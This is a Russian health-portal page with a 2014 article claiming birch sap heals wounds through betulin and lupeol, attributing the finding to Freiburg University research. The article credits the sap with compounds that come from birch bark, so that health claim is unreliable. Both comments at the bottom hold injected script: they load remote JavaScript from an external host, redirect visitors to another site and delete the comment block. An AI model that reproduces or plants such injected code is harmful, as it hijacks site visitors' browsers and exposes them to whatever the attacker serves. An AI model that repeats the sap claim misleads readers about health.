Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Березовый сок поможет ран...  >>  Березовый сок поможет ранам зажить
 
Обратная связь
 

Березовый сок поможет ранам зажить

Размер шрифта
26 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Целебные свойства березового сока наконец раскрыты! Теперь мы знаем, как березовый сок заживляет раны.

Березовый сок поможет ранам зажить

Издревле березовый сок использовался как традиционное средство для заживления ран и восстановления кожи. Профессор Ирмгард Мерфорт и ее коллеги из Института фармацевтических наук Фрайбургского университета изучили ранозаживляющее действие березового сока на молекулярном уровне. Данное исследование было проведено ими в сотрудничестве с Институтом молекулярной и клеточной медицины, Институтом экспериментальной и клинической фармакологии Фрайбургского университета, а также дерматологической клиникой Гамбургского университета.

В чем соль?

В первой фазе заживления раны клетки вырабатывают определенные вещества, которые вызывают временное воспаление. Они вызывают миграцию клеток фагоцитов в месте повреждения и поглощение ими мертвых тканей и бактерий. Ученые выяснили, что березовый сок, в частности, его главное активное вещество бетулин, повышает концентрацию тех самых противовоспалительных веществ.

Бетулин активирует белки, которые продлевают активность мРНК (матричной рибонуклеиновой кислоты). В норме генетическая информация переводится в мРНК для дальнейшего синтеза белков. Бетулин в три раза повышает время, в ходе которого мРНК остается активной. Таким образом, с помощью мРНК успевает синтезироваться гораздо больше воспалительных веществ.

В последующей фазе заживления клетки кожи мигрируют в рану и закрывают дефект кожи. Березовый сок помогает и здесь, а именно его активные компоненты бетулин и лупеол. Они влияют на актиновый цитоскелет клеток – «каркас», который помогает клеткам сохранять свою форму. Березовый сок ускоряет миграцию кератиноцитов – наиболее многочисленных клеток внешнего слоя кожи – в область раны, способствуя ее более быстрому заживлению.

Мы ни в коем случае не рекомендуем использовать березовый сок вместо стандартных лекарственных средств. Мы надеемся, что это открытие приведет к созданию еще более сильных заживляющих средств в будущем.

Данные материалы были опубликованы в 2014 году на основе исследования Фрайбургского университета.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Еда может заставить вас светится от красоты! Что есть?!   Кошмар! Сок нельзя пить, если хочешь быть красивой и стройной!   Целебное действие света   Худшие перекусы для детей  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
40+: как теперь есть?
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.